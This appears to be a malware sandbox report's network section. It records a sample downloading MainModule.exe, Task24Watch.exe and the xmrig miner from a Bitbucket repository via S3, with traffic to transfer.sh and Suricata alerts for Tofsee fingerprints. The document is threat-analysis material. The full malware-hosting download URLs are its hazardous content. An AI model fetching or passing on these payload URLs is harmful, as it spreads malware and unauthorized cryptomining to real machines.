NetWork | ZeroBOX

IP Address	Status	Action
104.192.141.1	Active	Moloch
144.76.136.153	Active	Moloch
164.124.101.2	Active	Moloch
168.119.228.126	Active	Moloch
52.216.212.249	Active	Moloch
52.217.40.228	Active	Moloch
54.231.132.1	Active	Moloch

Name	Response	Post-Analysis Lookup
bitbucket.org	A 104.192.141.1	104.192.141.1
bbuseruploads.s3.amazonaws.com	A 3.5.9.154 A 52.217.138.137 A 52.217.43.164 A 52.217.108.244 CNAME s3-1-w.amazonaws.com A 52.216.212.249 A 52.216.88.211 A 52.217.200.33 A 54.231.137.161 CNAME s3-w.us-east-1.amazonaws.com A 52.217.132.73 A 54.231.137.121 A 52.217.73.108 A 52.216.140.188 A 52.217.202.161 A 52.216.240.180 A 3.5.28.145 A 54.231.132.1 A 54.231.162.113 A 54.231.198.81 A 52.217.18.188 A 52.216.59.65 A 52.217.135.113 A 52.217.40.228 A 52.217.89.180 A 52.217.103.172	52.217.206.129
transfer.sh	A 144.76.136.153	144.76.136.153

TCP Requests

UDP Requests

GET 302 https://bitbucket.org/rpoverka/zhopa/downloads/MainModule.exe

HTTP/1.1 302 Found content-security-policy-report-only: base-uri 'self'; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com stats.g.doubleclick.net sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website server: envoy x-usage-quota-remaining: 999303.105 vary: Accept-Language, Origin x-usage-request-cost: 866.27 cache-control: max-age=0, no-cache, no-store, must-revalidate Content-Type: text/html; charset=utf-8 x-b3-traceid: 408aa5e47f821a94 x-usage-output-ops: 0 x-used-mesh: False x-dc-location: Micros-3 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Date: Tue, 21 Feb 2023 04:33:08 GMT x-usage-user-time: 0.025988 x-usage-system-time: 0.000000 location: https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/09293685-2c5d-4159-86d9-08c57e8e8de5/MainModule.exe?response-content-disposition=attachment%3B%20filename%3D%22MainModule.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHLH2DZ7U&Signature=VFctTT15Oy1pCiaL50jPJ9FZjcw%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDDlI4D0qJzDCLyV4sCK%2BATydA3JWrOh0cMOubezBVsXQR%2FU%2FxdqqCLfVyEmUqPgTWhLBPz5Zr5czddzsszsXHFjm1b9fwf0uSHkEq4y2CN6%2FZUsbdan4z2fd%2BjyC1AMdnaLr8W2WfpqEeTejTc9MrV1ptPEmwh%2BBAfQqD9A181S7BqhEy%2FzCiyvgPI8AQX2OJWvVbkdii83pzDQX6IWqUeaNaDx1vvVHQxH8tKUVPDiuO866bid5YIcvKCQpUgEJQXfHf9aZ%2BIlfNUYYjEko3Y7RnwYyLcKnJ4pxJmRnLWX47kqvK7YZM5DPIMVEnGMVLokXa6L%2BO%2FHbDJlhZEVB96P2tA%3D%3D&Expires=1676955237 expires: Tue, 21 Feb 2023 04:33:08 GMT x-served-by: 10bd9f68300c x-envoy-upstream-service-time: 618 content-language: en x-view-name: bitbucket.apps.downloads.views.download_file x-static-version: 7676b48801ad x-render-time: 0.48598599433898926 Connection: keep-alive x-usage-input-ops: 0 x-frame-options: SAMEORIGIN x-version: 7676b48801ad x-request-count: 3126 X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache" Content-Length: 0

GET 200 https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/09293685-2c5d-4159-86d9-08c57e8e8de5/MainModule.exe?response-content-disposition=attachment%3B%20filename%3D%22MainModule.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHLH2DZ7U&Signature=VFctTT15Oy1pCiaL50jPJ9FZjcw%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDDlI4D0qJzDCLyV4sCK%2BATydA3JWrOh0cMOubezBVsXQR%2FU%2FxdqqCLfVyEmUqPgTWhLBPz5Zr5czddzsszsXHFjm1b9fwf0uSHkEq4y2CN6%2FZUsbdan4z2fd%2BjyC1AMdnaLr8W2WfpqEeTejTc9MrV1ptPEmwh%2BBAfQqD9A181S7BqhEy%2FzCiyvgPI8AQX2OJWvVbkdii83pzDQX6IWqUeaNaDx1vvVHQxH8tKUVPDiuO866bid5YIcvKCQpUgEJQXfHf9aZ%2BIlfNUYYjEko3Y7RnwYyLcKnJ4pxJmRnLWX47kqvK7YZM5DPIMVEnGMVLokXa6L%2BO%2FHbDJlhZEVB96P2tA%3D%3D&Expires=1676955237

GET 302 https://bitbucket.org/rpoverka/zhopa/downloads/Task24Watch.exe

HTTP/1.1 302 Found content-security-policy-report-only: base-uri 'self'; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com stats.g.doubleclick.net sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website server: envoy x-usage-quota-remaining: 998982.902 vary: Accept-Language, Origin x-usage-request-cost: 1030.60 cache-control: max-age=0, no-cache, no-store, must-revalidate Content-Type: text/html; charset=utf-8 x-b3-traceid: a2c1697924f08b4d x-usage-output-ops: 0 x-used-mesh: False x-dc-location: Micros-3 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Date: Tue, 21 Feb 2023 04:33:17 GMT x-usage-user-time: 0.021893 x-usage-system-time: 0.009025 location: https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/03f126aa-6017-4520-92a2-c8112a6addd7/Task24Watch.exe?response-content-disposition=attachment%3B%20filename%3D%22Task24Watch.exe%22&AWSAccessKeyId=ASIA6KOSE3BNDUXZPH56&Signature=avwBuxkhd4Xgyixj2PMoYGET0Cg%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDEMf0%2F1ULRFra9C9SSK%2BAbVGxqOnGdvkQMEFBU0%2FF5kg6%2F4%2B0yBwTTPvUtiH8w9tjKMGuLIxouTSkyQPrmjHeqIuFXZoArYMHNan31MSIqcqQKgid1H5NS8ddkcKVW%2BhLj3OrmzhfPqif6CPZl1d6fUMX6wNPUdFX9ck2y7y2tn%2FGpmOAG2M5LDLEVeKC6yW1z5uxNT3isa69%2FTZk1uGwRJuKOV%2BvKyorHoxEf9ndewrbcqH4XNC38rhiWOPr9jrq5IEKnCVSHKkGvwUvSYo64%2FRnwYyLQEHG3flYspuy3K0djwJevY7Qp07PgKYmJk9mkBYg1wuoNRORGhmYCzHwiDmaw%3D%3D&Expires=1676955379 expires: Tue, 21 Feb 2023 04:33:17 GMT x-served-by: 10bd9f68300c x-envoy-upstream-service-time: 56 content-language: en x-view-name: bitbucket.apps.downloads.views.download_file x-static-version: 7676b48801ad x-render-time: 0.047059059143066406 Connection: keep-alive x-usage-input-ops: 0 x-frame-options: SAMEORIGIN x-version: 7676b48801ad x-request-count: 3378 X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache" Content-Length: 0

GET 200 https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/03f126aa-6017-4520-92a2-c8112a6addd7/Task24Watch.exe?response-content-disposition=attachment%3B%20filename%3D%22Task24Watch.exe%22&AWSAccessKeyId=ASIA6KOSE3BNDUXZPH56&Signature=avwBuxkhd4Xgyixj2PMoYGET0Cg%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDEMf0%2F1ULRFra9C9SSK%2BAbVGxqOnGdvkQMEFBU0%2FF5kg6%2F4%2B0yBwTTPvUtiH8w9tjKMGuLIxouTSkyQPrmjHeqIuFXZoArYMHNan31MSIqcqQKgid1H5NS8ddkcKVW%2BhLj3OrmzhfPqif6CPZl1d6fUMX6wNPUdFX9ck2y7y2tn%2FGpmOAG2M5LDLEVeKC6yW1z5uxNT3isa69%2FTZk1uGwRJuKOV%2BvKyorHoxEf9ndewrbcqH4XNC38rhiWOPr9jrq5IEKnCVSHKkGvwUvSYo64%2FRnwYyLQEHG3flYspuy3K0djwJevY7Qp07PgKYmJk9mkBYg1wuoNRORGhmYCzHwiDmaw%3D%3D&Expires=1676955379

GET 302 https://bitbucket.org/rpoverka/zhopa/downloads/xmrig.exe

HTTP/1.1 302 Found content-security-policy-report-only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com stats.g.doubleclick.net sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; object-src 'none'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website server: envoy x-usage-quota-remaining: 999078.046 vary: Accept-Language, Origin x-usage-request-cost: 936.47 cache-control: max-age=0, no-cache, no-store, must-revalidate Content-Type: text/html; charset=utf-8 x-b3-traceid: 5a5f47b57fe7862a x-usage-output-ops: 0 x-used-mesh: False x-dc-location: Micros-3 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Date: Tue, 21 Feb 2023 04:33:39 GMT x-usage-user-time: 0.028094 x-usage-system-time: 0.000000 location: https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/b3a0e12f-e350-4a5c-8239-1cb38b0ef068/xmrig.exe?response-content-disposition=attachment%3B%20filename%3D%22xmrig.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJFRFBCRB&Signature=Igv5ADbIOFzJ%2FL1GdVUwoZJ1ANQ%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDGmgGod9JRtPIJ5J4iK%2BAZ%2BQf48tgsYZfpo4Jv0ino2j8ZYKs9z3%2F4NzmPnRh8UjeASue%2FAqqStw1rcdJ1Q4OZPvB9TxKnagXZ4zUSHd%2BMoCmzQTTS%2FEJ4X7Jet0ittMt%2BwyEeZlQpBVreTLIyHR7YL9OLNMvuZ%2BNo5LL4F%2FYZiU5tAhJG9ymJHifuKiVUG%2F7ws5w%2BEtN6zXSPHZgF0ke%2BCfYANSVAaxz9nGIdD4w2EDsUUiZP%2BdvKALJrgY19BYakB2ZKockBrXLbvh4XoonJDRnwYyLaJSIHYriwNaDqOPi%2FmZw7OZUkogXNtLqHRkzUkMTDnv8aSn%2BZV7kaEstYBcdg%3D%3D&Expires=1676955428 expires: Tue, 21 Feb 2023 04:33:39 GMT x-served-by: 22360fed4cf9 x-envoy-upstream-service-time: 60 content-language: en x-view-name: bitbucket.apps.downloads.views.download_file x-static-version: 7676b48801ad x-render-time: 0.04874062538146973 Connection: keep-alive x-usage-input-ops: 0 x-frame-options: SAMEORIGIN x-version: 7676b48801ad x-request-count: 3239 X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache" Content-Length: 0

GET 200 https://bbuseruploads.s3.amazonaws.com/92650141-3771-4ef6-8487-a8ce5ad2e240/downloads/b3a0e12f-e350-4a5c-8239-1cb38b0ef068/xmrig.exe?response-content-disposition=attachment%3B%20filename%3D%22xmrig.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJFRFBCRB&Signature=Igv5ADbIOFzJ%2FL1GdVUwoZJ1ANQ%3D&x-amz-security-token=FwoGZXIvYXdzEC4aDGmgGod9JRtPIJ5J4iK%2BAZ%2BQf48tgsYZfpo4Jv0ino2j8ZYKs9z3%2F4NzmPnRh8UjeASue%2FAqqStw1rcdJ1Q4OZPvB9TxKnagXZ4zUSHd%2BMoCmzQTTS%2FEJ4X7Jet0ittMt%2BwyEeZlQpBVreTLIyHR7YL9OLNMvuZ%2BNo5LL4F%2FYZiU5tAhJG9ymJHifuKiVUG%2F7ws5w%2BEtN6zXSPHZgF0ke%2BCfYANSVAaxz9nGIdD4w2EDsUUiZP%2BdvKALJrgY19BYakB2ZKockBrXLbvh4XoonJDRnwYyLaJSIHYriwNaDqOPi%2FmZw7OZUkogXNtLqHRkzUkMTDnv8aSn%2BZV7kaEstYBcdg%3D%3D&Expires=1676955428

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

Flow	SID	Signature	Category
TCP 144.76.136.153:443 -> 192.168.56.103:49172	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49170 -> 52.216.212.249:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49172 -> 144.76.136.153:443	2035145	ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI)	Misc activity
TCP 192.168.56.103:49172 -> 144.76.136.153:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49172 -> 144.76.136.153:443	2035145	ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI)	Misc activity
UDP 192.168.56.103:64894 -> 8.8.8.8:53	2034316	ET POLICY Observed DNS Query to File Transfer Service Domain (transfer .sh)	Potentially Bad Traffic
UDP 192.168.56.103:64894 -> 8.8.8.8:53	2035139	ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in DNS Lookup)	Misc activity
UDP 192.168.56.103:64894 -> 164.124.101.2:53	2034316	ET POLICY Observed DNS Query to File Transfer Service Domain (transfer .sh)	Potentially Bad Traffic
UDP 192.168.56.103:64894 -> 164.124.101.2:53	2035139	ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in DNS Lookup)	Misc activity
TCP 192.168.56.103:49209 -> 104.192.141.1:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49169 -> 104.192.141.1:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49181 -> 104.192.141.1:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49182 -> 54.231.132.1:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49210 -> 52.217.40.228:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49172 -> 144.76.136.153:443	2035145	ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI)	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.103:49170 52.216.212.249:443	C=US, O=Amazon, OU=Server CA 1B, CN=Amazon	CN=*.s3.amazonaws.com	ec:b2:cb:26:56:49:75:2a:47:ef:84:49:5a:ca:b7:a5:b3:48:78:2b
TLS 1.2 192.168.56.103:49209 104.192.141.1:443	C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1	unknown=US, unknown=Delaware, unknown=Private Organization, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., CN=bitbucket.org	7d:81:14:7c:39:c5:20:46:2f:43:d4:e8:61:e5:8f:c2:ac:3a:63:cc
TLS 1.2 192.168.56.103:49169 104.192.141.1:443	C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1	unknown=US, unknown=Delaware, unknown=Private Organization, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., CN=bitbucket.org	7d:81:14:7c:39:c5:20:46:2f:43:d4:e8:61:e5:8f:c2:ac:3a:63:cc
TLS 1.2 192.168.56.103:49181 104.192.141.1:443	C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1	unknown=US, unknown=Delaware, unknown=Private Organization, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., CN=bitbucket.org	7d:81:14:7c:39:c5:20:46:2f:43:d4:e8:61:e5:8f:c2:ac:3a:63:cc
TLS 1.2 192.168.56.103:49182 54.231.132.1:443	C=US, O=Amazon, OU=Server CA 1B, CN=Amazon	CN=*.s3.amazonaws.com	ec:b2:cb:26:56:49:75:2a:47:ef:84:49:5a:ca:b7:a5:b3:48:78:2b
TLS 1.2 192.168.56.103:49210 52.217.40.228:443	C=US, O=Amazon, OU=Server CA 1B, CN=Amazon	CN=*.s3.amazonaws.com	ec:b2:cb:26:56:49:75:2a:47:ef:84:49:5a:ca:b7:a5:b3:48:78:2b

Snort Alerts

No Snort Alerts